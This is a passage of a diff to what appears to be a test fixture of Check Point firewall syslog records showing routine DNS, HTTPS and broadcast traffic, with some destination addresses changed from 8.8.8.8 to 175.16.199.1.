src:"192.168.2.2"] +<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506190"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36179"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.140.246"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57736"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506190"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38550"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506190"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38550"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47064"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506191"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59288"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506191"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37335"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506191"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59288"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506191"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37335"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58862"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T18:23:17Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e798,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"] <134>1 2020-03-29T18:24:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e7c2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52483"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] 
@@ -3927,8 +3927,8 @@ <134>1 2020-03-29T18:27:03Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e879,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"] <134>1 2020-03-29T18:27:48Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e8a4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] <134>1 2020-03-29T18:27:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e8a6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58244"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46222"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58244"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46222"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49038"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:28:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e8b9,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"] <134>1 2020-03-29T18:28:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e8d4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50746"; service:"443"; 
service_id:"https"; src:"192.168.1.117"] 
@@ -3969,11 +3969,11 @@
 <134>1 2020-03-29T18:32:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e9c5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:32:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e9cd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50169"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:32:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e9cd,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64164"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10230"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33445"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37364"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50738"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42644"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44668"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
